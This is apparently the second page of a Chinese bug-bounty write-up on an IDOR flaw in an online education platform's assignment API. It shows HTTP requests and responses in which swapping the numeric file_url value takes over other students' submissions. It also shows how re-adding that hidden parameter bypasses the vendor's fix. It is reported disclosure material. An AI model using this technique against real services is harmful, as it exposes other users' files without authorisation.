主页 > 网络知识 > 知名在线教育平台的IDOR漏洞(2)

知名在线教育平台的IDOR漏洞(2)

{"title":"Assignment","student":"40994","section_id":"case","completed":false,"lesson":"26201","assignment":"4579","answers":[{"field_answer":"hello","field_question_ref":"4569"},"file_url":"5830"}

在上述请求中可以看到,其file_url为数据型的,通过更改其中的数值就能把其他学生的提交作业变成我的提交作业了,同时还能看到其他学生的作业信息,如下:

HTTP/1.1 200 OK

Accept-Ranges: bytes

Age: 0

Cache-Control: no-cache, must-revalidate

Content-Type: application/json; charset=utf-8

Date: Sun, 12 May 2019 18:01:07 GMT

Expires: Sun, 19 Nov 1978 05:00:00 GMT

Server: Apache/2.2.15 (Red Hat)

Vary: Accept

Via: 1.1 varnish

WebServer: prod1-md

X-API-Version: v1.0

X-Cache: MISS

X-Content-Type-Options: nosniff

X-Drupal-Cache: MISS

X-Powered-By: PHP/7.1.23

X-Varnish: 762262632

Content-Length: 1465

Connection: Close

X-Iinfo: 14-119388817-119389061 NNNN CT(0 0 0) RT(1557684060144 1031) q(0 0 0 -1) r(55 55) U6

X-CDN: Incapsula

{"data":[REDUCTED"file_url":"https://files.xyz.org/user_files/simulation_27244/MD MEMO_0.docx","REDUCTED}}

在发现以上漏洞后,我及时提交给了厂商,当漏洞修复完成时,我在复测时,又发现了上面这个作业提交请求中还仍然存在IDOR漏洞。修复后的作业提交请求如下:

PATCH /api/api/v1.0/lesson/30699/assessment_answer/30709 HTTP/1.1

Host: xyz.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0

Accept: application/json

Accept-Language: en-US,en;q=0.5

Referer: https://xyz.org/

Access-Token: HNg-F0wiTIrxDtc1qDQL2TjHv-ERroxmIowIUkM8Blo

Content-Type: application/json; charset=utf-8

Content-Length: 1206

Cookie: [REDUCTED]

{"completed":true,"answers":[{"field_answer":"xyz.burpcollaborator.net","[Reducted]:"xyz.burpcollaborator.net","field_question_ref":"139"}]}

可见,其中确实没有了file_url参数。在BurpSuite中的请求如下:

 

知名在线教育平台的IDOR漏洞

 

响应如下:

 

知名在线教育平台的IDOR漏洞

 

奇怪的是,响应内容中可以看到一个“file_url”:null名值对,所以,我又尝试在请求中添加进了“file_url”参数值,果然,还是和修复之前一样可以成功响应!所以最后的经验是,要学会从请求的响应中观察那些隐藏的参数。

 

知名在线教育平台的IDOR漏洞

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!